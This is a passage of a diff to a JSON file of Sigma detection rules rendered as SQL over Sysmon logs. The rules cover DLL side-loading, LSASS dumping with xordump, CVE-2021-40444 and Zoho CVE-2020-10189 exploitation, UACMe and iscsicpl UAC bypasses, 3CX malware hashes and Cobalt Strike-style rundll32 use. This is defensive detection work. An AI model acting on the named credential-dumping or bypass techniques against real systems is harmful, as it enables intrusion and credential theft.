'%\\\\osuninst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2p.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p2pnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\p9np.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pcaui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\peerdistsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pla.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pnrpnsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\policymanager.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\polstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\printui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\propsys.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prvdmofcomp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\puiapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\radcui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasgcw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasman.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasmontr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reagent.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\regapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rmclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpcnsh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rtworkq.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sapi\\_onecore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sas.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scansetting.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\scecli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\schedcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\secur32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\shell32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\slc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\snmpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\spp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srvcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssp\\_isv.exe\\_rsaenh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sspicli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\staterepository.core.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\structuredquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sxshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tbs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tquery.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsworkspace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ttdrecord.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\twinui.appcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uianimation.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiautomationcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uireng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uiribbon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\updatepolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\userenv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utildll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxinit.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\uxtheme.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vaultcli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\virtdisk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vssapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsstrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemprox.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcmapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wcnnetsh.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\wdi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wdscore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\webservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wecapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wer.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wevtapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\whhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wimgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbrand.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.storage.search.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecs.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowscodecsext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windowsudk.shellcommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winhttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wininet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winipsec.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmde.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winmm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winnsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winrnr.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsqlite3.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsta.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wkscli.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlanapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wldp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlidprov.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiclnt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmidcom.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmiutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmsgapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wofutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wpdshext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshbth.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wshelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wtsapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwapi.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\xmllite.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xolehlp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwizards.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xwtpw32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\aclui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bderepair.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootmenuux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dcntel.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dwmcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dynamoapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fhsvcctl.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsst.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\inproclogger.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumbase.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\kdstub.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\maintenanceui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mdmdiagnostics.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mintdh.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtctm.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\nettrace.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\osksupport.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\reseteng.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\resetengine.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\spectrumsyncclient.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\systemsettingsthresholdadminflowui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\timesync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\upshared.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wmpdui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wwancfg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dpx.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxsapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fxstiff.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\xpsservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appvpolicy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\batmeter.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\bootux.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cmutil.dll' ESCAPE '\\' OR 
ImageLoaded LIKE '%\\\\configmanager2.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coredplus.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\coreuicomponents.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptsp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dmcommandlineutils.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\drvstore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsprop.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxcore.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\edgeiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\framedynos.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fveskybackup.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\fvewiz.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\gpapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\icmp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\ifsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\iumsdk.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockhostingframework.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lrwizdll.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mbaexmlparser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\mfc42u.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msiso.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msvcp110\\_win.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netapi32.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netjoin.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\netprovfw.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\opcservices.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\pkeyhelper.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\playsndsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\powrprof.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\prntvpt.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\profapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximitycommon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\proximityservicepal.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rasdlg.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\security.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\sppcext.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\srmtrace.dll' ESCAPE '\\' OR ImageLoaded LIKE 
'%\\\\tpmcoreprovisioning.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\umpdc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\unattend.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\urlmon.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vdsutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\version.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winbio.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\windows.ui.immersive.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winscard.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\winsync.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wscapi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wsmsvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FxsCompose.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WfsR.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rpchttp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\storageusage.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\amsi.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\PrintIsolationProxy.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\msdtcVSp1res.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\rdpendp.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dxilconv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\utcutil.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\appraiser.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\dsound.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\DispBroker.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\FXSRESM.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\cryptnet.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\COMRES.DLL' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdumdim64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd10iumd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igd12umd64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\igdusc64.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WLBSCTRL.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSMSISrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\TSVIPSrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wow64log.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WptsExtensions.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wbemcomn.dll' ESCAPE '\\') AND NOT 
(((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SoftwareDistribution\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\SystemTemp\\\\%' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\AppVPolicy.dll' ESCAPE '\\' AND Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ClickToRun\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (ImageLoaded LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\backgroundTaskHost.exe%' ESCAPE '\\') AND ImageLoaded LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\cleanmgr.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\ssshim.dll' ESCAPE '\\') OR (Image LIKE 'C:\\\\$WINDOWS.~BT\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\WindowsApps\\\\DellInc.DellSupportAssistforPCs%' ESCAPE '\\' AND Image LIKE '%\\\\wldp.dll' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\xordump.exe' ESCAPE '\\' OR (CommandLine LIKE '% -process lsass.exe %' ESCAPE '\\' OR CommandLine LIKE '% -m comsvcs %' ESCAPE '\\' OR CommandLine LIKE '% -m dbghelp %' ESCAPE '\\' OR CommandLine LIKE '% -m dbgcore %' ESCAPE '\\')))" ], - "filename": "image_load_side_load_from_non_system_location.yml" + "filename": "proc_creation_win_hktl_xordump.yml" }, { - "title": "PCRE.NET Package Image Load", - "id": "84b0a8f3-680b-4096-a45b-e9a89221727c", + "title": "Potential CVE-2021-40444 Exploitation Attempt", + "id": "894397c6-da03-425c-a589-3d09e7d1f750", 
"status": "test", - "description": "Detects processes loading modules related to PCRE.NET package", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects potential exploitation of CVE-2021-40444 via suspicious process patterns seen in in-the-wild exploitations", + "author": "Florian Roth (Nextron Systems), @neonprimetime", "tags": [ "attack.execution", "attack.t1059" 
@@ -5770,34 +5598,40 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ImageLoaded LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\ba9ea7344a4a5f591d6e5dc32a13494b\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\')) AND NOT ((CommandLine LIKE '%\\\\control.exe input.dll' ESCAPE '\\' OR CommandLine LIKE '%\\\\control.exe\" input.dll' ESCAPE '\\')))" ], - "filename": "image_load_pcre_net_load.yml" + "filename": "proc_creation_win_exploit_cve_2021_40444.yml" }, { - "title": "Malicious DLL Load By Compromised 3CXDesktopApp", - "id": "d0b65ad3-e945-435e-a7a9-438e62dd48e9", - "status": "experimental", - "description": "Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploited CVE-2020-10189 Zoho ManageEngine", + "id": "846b866e-2a57-46ee-8e16-85fa92759be7", + "status": "test", + "description": "Detects the exploitation of Zoho ManageEngine Desktop Central Java Deserialization vulnerability reported as CVE-2020-10189", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1059.001", + "attack.t1059.003", + "attack.s0190", + "cve.2020.10189" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896%' ESCAPE '\\' OR Hashes LIKE '%SHA1=BF939C9C261D27EE7BB92325CC588624FCA75429%' ESCAPE '\\' 
OR Hashes LIKE '%MD5=74BC2D0B6680FAA1A5A76B27E5479CBC%' ESCAPE '\\' OR Hashes LIKE '%SHA256=11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03%' ESCAPE '\\' OR Hashes LIKE '%SHA1=20D554A80D759C50D6537DD7097FED84DD258B3E%' ESCAPE '\\' OR Hashes LIKE '%MD5=82187AD3F0C6C225E2FBA0C867280CC9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952%' ESCAPE '\\' OR Hashes LIKE '%SHA1=894E7D4FFD764BB458809C7F0643694B036EAD30%' ESCAPE '\\' OR Hashes LIKE '%MD5=11BC82A9BD8297BD0823BCE5D6202082%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423%' ESCAPE '\\' OR Hashes LIKE '%SHA1=3B3E778B647371262120A523EB873C20BB82BEAF%' ESCAPE '\\' OR Hashes LIKE '%MD5=7FAEA2B01796B80D180399040BB69835%' ESCAPE '\\') OR sha256 IN ('7986BBAEE8940DA11CE089383521AB420C443AB7B15ED42AED91FD31CE833896', '11BE1803E2E307B647A8A7E02D128335C448FF741BF06BF52B332E0BBF423B03', 'F79C3B0ADB6EC7BCC8BC9AE955A1571AAED6755A28C8B17B1D7595EE86840952', '8AB3A5EAAF8C296080FADF56B265194681D7DA5DA7C02562953A4CB60E147423') OR sha1 IN ('BF939C9C261D27EE7BB92325CC588624FCA75429', '20D554A80D759C50D6537DD7097FED84DD258B3E', '894E7D4FFD764BB458809C7F0643694B036EAD30', '3B3E778B647371262120A523EB873C20BB82BEAF') OR md5 IN ('74BC2D0B6680FAA1A5A76B27E5479CBC', '82187AD3F0C6C225E2FBA0C867280CC9', '11BC82A9BD8297BD0823BCE5D6202082', '7FAEA2B01796B80D180399040BB69835')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%DesktopCentral\\_Server\\\\jre\\\\bin\\\\java.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\bitsadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR Image LIKE '%\\\\net.exe' ESCAPE '\\' OR Image LIKE '%\\\\net1.exe' ESCAPE '\\' OR Image LIKE '%\\\\reg.exe' ESCAPE '\\' OR Image LIKE 
'%\\\\query.exe' ESCAPE '\\'))" ], - "filename": "image_load_malware_3cx_compromise_susp_dll.yml" + "filename": "proc_creation_win_exploit_cve_2020_10189.yml" }, { - "title": "UAC Bypass Using Iscsicpl - ImageLoad", - "id": "9ed5959a-c43c-4c59-84e3-d28628429456", + "title": "HackTool - UACMe Akagi Execution", + "id": "d38d2fa4-98e6-4a24-aff1-410b0c9ad177", "status": "experimental", - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of UACMe, a tool used for UAC bypasses, via default PE metadata", + "author": "Christian Burkard (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", "attack.privilege_escalation", 
@@ -5808,977 +5642,973 @@ ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\iscsicpl.exe' ESCAPE '\\' AND ImageLoaded LIKE '%\\\\iscsiexe.dll' ESCAPE '\\') AND NOT (ImageLoaded LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\' AND ImageLoaded LIKE '%iscsiexe.dll%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Product = 'UACMe' OR Company IN ('REvol Corp', 'APT 92', 'UG North', 'Hazardous Environments', 'CD Project Rekt') OR Description IN ('UACMe main module', 'Pentesting utility') OR OriginalFileName IN ('Akagi.exe', 'Akagi64.exe') OR (Image LIKE '%\\\\Akagi64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Akagi.exe' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=767637C23BB42CD5D7397CF58B0BE688%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=14C4E4C72BA075E9069EE67F39188AD8%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3C782813D4AFCE07BBFC5A9772ACDBDC%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=7D010C6BB6A3726F327F7E239166D127%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=89159BA4DD04E4CE5559F132A9964EB3%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6F33F4A5FC42B8CEC7314947BD13F30F%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5834ED4291BDEB928270428EBBAF7604%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=5A8A8A43F25485E7EE1B201EDCBC7A38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=DC7D30B90B2D8ABF664FBED2B1B59894%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=41923EA1F824FE63EA5BEB84DB7A3E74%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=3DE09703C8E79ED2CA3F01074719906B%' ESCAPE '\\') OR Imphash IN ('767637c23bb42cd5d7397cf58b0be688', '14c4e4c72ba075e9069ee67f39188ad8', '3c782813d4afce07bbfc5a9772acdbdc', '7d010c6bb6a3726f327f7e239166d127', '89159ba4dd04e4ce5559f132a9964eb3', '6f33f4a5fc42b8cec7314947bd13f30f', '5834ed4291bdeb928270428ebbaf7604', '5a8a8a43f25485e7ee1b201edcbc7a38', 'dc7d30b90b2d8abf664fbed2b1b59894', '41923ea1f824fe63ea5beb84db7a3e74', 
'3de09703c8e79ed2ca3f01074719906b')))" ], - "filename": "image_load_uac_bypass_iscsicpl.yml" + "filename": "proc_creation_win_hktl_uacme.yml" }, { - "title": "DotNet CLR DLL Loaded By Scripting Applications", - "id": "4508a70e-97ef-4300-b62b-ff27992990ea", - "status": "test", - "description": "Detects .NET CLR DLLs being loaded by scripting applications such as wscript or cscript. This could be an indication of potential suspicious execution.", - "author": "omkar72, oscd.community", + "title": "Suspicious Rundll32 Without Any CommandLine Params", + "id": "1775e15e-b61b-4d14-a1a3-80981298085a", + "status": "experimental", + "description": "Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" + "attack.defense_evasion", + "attack.t1202" ], "falsepositives": [ - "Unknown" + "Possible but rare" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '7' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (Image LIKE '%\\\\cmstp.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\mshta.exe' ESCAPE '\\' OR Image LIKE '%\\\\msxsl.exe' ESCAPE '\\' OR Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\wscript.exe' 